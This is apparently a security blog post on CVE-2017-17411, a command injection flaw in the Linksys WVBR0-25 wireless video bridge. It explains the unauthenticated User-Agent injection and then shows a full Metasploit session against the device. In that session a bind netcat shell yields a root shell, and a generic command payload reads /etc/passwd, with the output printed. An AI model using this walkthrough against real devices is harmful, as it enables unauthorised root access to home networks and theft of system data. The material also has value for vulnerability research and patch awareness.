Router Exploitation Shellsploit Vulnerability Analysis Vulnerability Scanner

CVE-2017-17411: Linksys WVBR0 25 Command Injection

Recently a security researcher Ricky Lawshae from Trend Micro discover a critical vulnerability on Linksys Wireless Bridge WVBR0-25 this allows remote attackers to execute arbitrary code on vulnerable installations of Linksys WVBR0 WVBR0.

Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges.


Getting a Root Shell on a Linksys WVBR0 25

exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth Metasploit module

This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to “; #. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info
Name: Linksys WVBR0-25 User-Agent Command Execution
Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
Platform: Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-12-13
Provided by:
Available targets:
Id  Name
--  ----
0   Automatic
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST                     yes       The target address
RPORT    80               yes       The target port
SSL      false            no        Negotiate SSL/TLS for outgoing connections
VHOST                     no        HTTP server virtual host
Payload information:
Space: 1024
The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
to OS command injection in version < 1.0.41 of the web management portal via the User-Agent header. Authentication is not required to exploit this vulnerability. References: msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads 
Compatible Payloads
Name                     Disclosure Date  Rank    Description
----                     ---------------  ----    -----------
cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
cmd/unix/generic                          normal  Unix Command, Generic Command Execution
cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] - Trying to access the device ...
[*] Started bind handler
[*] - Exploiting...
[*] Command shell session 1 opened ( -> at 2017-12-21 17:09:54 -0600
uid=0(root) gid=0(root)
Abort session 1? [y/N]  y
[*] - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] - Trying to access the device ...
[*] - Exploiting...
[+] - Command sent successfully
[*] - Command output:  root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >


Post Comment